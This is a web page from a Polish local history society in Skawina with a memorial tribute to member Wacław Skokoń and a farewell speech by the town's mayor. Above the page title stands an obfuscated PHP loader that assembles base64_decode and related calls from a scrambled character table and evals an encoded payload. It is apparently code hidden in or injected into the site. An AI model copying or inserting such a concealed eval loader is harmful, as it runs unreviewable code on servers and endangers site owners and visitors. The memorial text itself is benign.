$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iRG9oSHpPY2luc0xDZ1V5R1JQbUt1UWVxRmpKWmF3QkFmVlRJZFdrYnhsdnByU3RZWE1ORWFQa215aXFkV1NjTkZCTW5sVll2dWJlQ1JLSnpwRVpPZ3JIakl3aGZvVVhER0xBc3h0UVRWYTlFcG1PRmFiUD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> ROK 2010 | Towarzystwo Przyjaciół Skawiny

Towarzystwo Przyjaciół Skawiny

ROK 2010

data dodania: 20 listopada 2012

Pamięci Wacława Skokonia

Do grona Osób, które aktywnie działały przez długie lata w Towarzystwie Przyjaciół Skawiny i odeszły na zawsze – 27.06.2010 dołączył śp. Wacław Skokoń. Pożegnaliśmy Go w dniu 01.07.2010, uczestnicząc w uroczystości pogrzebowej. Słowa pożegnania od Zarządu wygłosił p. Zdzisław Liskiewicz, pożegnał go również serdecznymi słowami p. Burmistrz Adam Najder. Kolega Wacław wstąpił do TPS w 1981r. Od czerwca 1993r. był członkiem naszego Zarządu, później Wiceprzewodniczącym i Skarbnikiem. Przez dwa lata prowadził sekretariat, a od września 2005r. był Przewodniczącym Komisji Rewizyjnej. W swojej działalności wykazywał duże zaangażowanie. Nie było żadnej ważnej sprawy w TPS, w której by nie uczestniczył. Reprezentował Zarząd na różnych uroczystościach i konkursach szkolnych. Zapoznawał młodzież z historią Skawiny, dbał o to, aby przetrwała tradycja i pamięć o przeszłości. Był dobrym organizatorem. Przez kilka lat był Komandorem Zlotów Turystycznych w Tyńcu, organizowanych wspólnie z kołem PTTK w Skawinie, którego był aktywnym członkiem ponad pół wieku. Zloty były bardzo udane, w dużej mierze była to jego zasługa. Brał udział w segregowaniu tematycznym, opisywaniu i inwentaryzacji naszych zbiorów. Oprowadzał grupy osób zwiedzających wystawę z historii Skawiny, prezentowaną w naszej siedzibie. Ma swój wkład w przygotowanie materiałów do książki „Zarys dziejów Skawiny”. Uczestniczył w naszych przeprowadzkach oraz w przygotowaniu wystawy na otwarcie Muzeum Regionalnego. Działał w Kole Przyjaciół Harcerstwa „Braterski Węzeł” w Skawinie oraz – przez długie lata w Związku Harcerstwa Rzeczypospolitej w Kręgu Seniorów Harcerstwa Borkowskiego „Stara Brać” – im. Karola Wojtyły – w Borku Fałęckim. Harcerze z tego kręgu uczestniczyli w uroczystości pogrzebowej. W latach 1994-1998 był członkiem Komisji Ekologicznej Rady Miejskiej w Skawinie. Za swoją działalność zawodową i społeczną był odznaczony m.in.: Srebrnym i Złotym Krzyżem Zasługi, Złotą Odznaką „Za pracę społeczną dla miasta Krakowa”, Złotą Odznaką „Za zasługi dla Ziemi Krakowskiej”, Srebrną i Złotą Odznaką Centralnego Związku Spółdzielni Budownictwa Mieszkaniowego, Medalem 600-lecia Skawiny, Odznaką z tytułu: „50 Lat przynależności do PTTK”. Śp. Wacław Skokoń był uczciwym, prawym człowiekiem, uczynnym i pracowitym, czym pozyskiwał życzliwość, szacunek i sympatię ludzi. Za Jego przyjaźń i działanie Trwała pamięć w naszych myślach Wdzięczność w sercach pozostanie.

Pan burmistrz Adam Najder pożegnał śp. Wacława Skokonia słowami: 

Zgromadzeni na nabożeństwie z głębokim bólem żegnamy dzisiaj Wacława Skokonia. Przez 20 lat miałem szczęście z nim współpracować w naszej Skawińskiej Spółdzielni Mieszkaniowej. Odszedł od nas wyjątkowo życzliwy kolega, do którego można było zwrócić się w różnych sprawach mając pewność, że nie pozostawi nas bez rady i pomocy. Odszedł społecznik niezmiernie zaangażowany w życie Spółdzielni. Człowiek szlachetny i uczciwy, który w środowisku pracy cieszył się zasłużenie wielkim autorytetem moralnym i zawodowym. W naszych sercach pozostanie po Nim dobra pamięć. Wacku, dziękuje za Twoją obecność, dziękuje za każdą Twoją radę, dziękuje za wieloletnią współpracę w Spółdzielni.Rodzinie i bliskim Zmarłego pragnę złożyć kondolencje oraz wyrazy głębokiego współczucia. 

NIECH SAM OJCIEC ODWIECZNY OBEJMIE CIĘ WACŁAWIE WIELKODUSZNYM
UŚCISKIEM, SWOIMI SZCZODRYMI RAMIONAMI. 
                                                                                                                                            Żegnaj